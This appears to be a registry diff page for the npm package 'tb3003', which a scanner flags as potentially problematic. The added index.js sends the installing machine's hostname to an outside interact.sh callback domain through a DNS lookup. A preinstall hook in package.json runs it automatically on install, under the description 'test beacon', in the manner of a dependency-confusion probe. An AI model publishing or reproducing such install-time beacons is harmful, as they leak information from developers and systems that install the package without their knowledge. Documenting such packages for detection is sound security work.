tb3003 30.3.22

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of tb3003 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ require('dns').lookup(require('os').hostname() + '.c8y43wf2vtc00007vdjggrxnb6eyyyyyb.interact.sh', () => {});
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "tb3003",
3
+ "version": "30.03.22",
4
+ "description": "test beacon",
5
+ "main":"index.js",
6
+ "scripts":{
7
+ "test":"echo 'error no test specified' && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author":"",
11
+ "License":"ISC"
12
+ }